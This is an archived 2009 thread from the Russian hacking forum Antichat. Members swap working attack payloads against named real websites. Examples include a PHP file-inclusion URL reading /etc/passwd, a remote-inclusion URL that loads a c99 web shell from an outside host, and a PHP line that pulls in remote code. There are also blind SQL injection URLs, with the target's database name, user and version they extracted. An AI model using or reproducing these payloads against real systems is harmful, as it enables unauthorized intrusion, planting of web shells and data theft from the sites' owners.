ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
01.03.2009, 01:28
|
|
Познающий
Регистрация: 18.11.2008
Сообщений: 53
Провел на форуме:
170968
Репутация:
10
|
|
Можно ли как-то раскрутить пхпинклюд http://volkswagen.msk.ru/?p=../../../../../../../../../../etc/passwd%00 ? Стандартные методы не работают))
|
|
|
01.03.2009, 05:11
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123
Репутация:
122
|
|
а как такой роскрутить?
http://shop.zano.ru/index.php?act=13 order by 1
|
|
|
|
01.03.2009, 05:18
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
Сообщение от TELO
а как такой роскрутить?
http://shop.zano.ru/index.php?act=13 order by 1
ошибку видишь?
Warning: include() [function.include]: Failed opening '13-1.php' for inclusion (include_path='.:/usr/local/lib/php') in /home/host700852/zano.ru/htdocs/shop/index.php on line 204 
|
|
|
|
01.03.2009, 13:23
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
http://shop.zano.ru/index.php?act=http://mail.ru/?
ыы
|
|
|
|
01.03.2009, 13:37
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
http://shop.zano.ru/index.php?act=http://wowbkdo.narod.ru/c99madshell =)))
|
|
|
|
01.03.2009, 13:59
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
Сообщение от j0ker13
2razor
работает) но как можно по аналогии вытащить имена колонок?)
SELECT TOP 1 COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_NAME='tbl' AND COLUMN_NAME NOT IN(SELECT TOP x COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_NAME='tbl' ORDER BY COLUMN_NAME) ORDER BY COLUMN_NAME
|
|
|
|
01.03.2009, 14:08
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
Всем здрасти
При подборе колонок выводиться
Mixing of GROUP columns (MIN(),MAX(),COUNT(),...)
Перебрал 20 колонок все так же
URL:
http://frutonyanya.ru/php/news.php?c=1'
 |
|
|
|
01.03.2009, 14:29
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Pashkela в своём духе =)
Код:
if(isset($_GET['cmd'])){$f=require("http://pashkela.narod.ru/tema1.txt");die($f);}
Файлик -абревиатура от вебмани
diznt, там же ясно пишет. Запрещен микс груп бай и других параметров, кроме мин, макс, каунт...
|
|
|
|
01.03.2009, 14:30
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
2 diznt
blind sql injection
version: 4.1.22-log
database : frutony3_fn
user : frutony3_fn@localhost
http://frutonyanya.ru/php/news.php?n=25&c=49+AND+ASCII(SUBSTRING((select+use r()),1,1))>x
|
|
|
|
01.03.2009, 14:30
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Сообщение от diznt
Всем здрасти
При подборе колонок выводиться
Mixing of GROUP columns (MIN(),MAX(),COUNT(),...)
Перебрал 20 колонок все так же
URL:
http://frutonyanya.ru/php/news.php?c=1'
https://forum.antichat.ru/showpost.php?p=966458&postcount=3908
советую забить на скулю доступа к information_schema нет
http://frutonyanya.ru/php/news.php?c=77+group+by+'cc'+and+(select+1+from+inf ormation_schema.tables)--
//add а ну да не обратил внимания на ветку=) 4.1
Последний раз редактировалось l1ght; 01.03.2009 в 14:36..
|
|
|
|
|
|
|
|
Здесь присутствуют: 6 (пользователей: 0 , гостей: 6)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?1143557){kind=avatar}
Похожие темы
Линейный вид
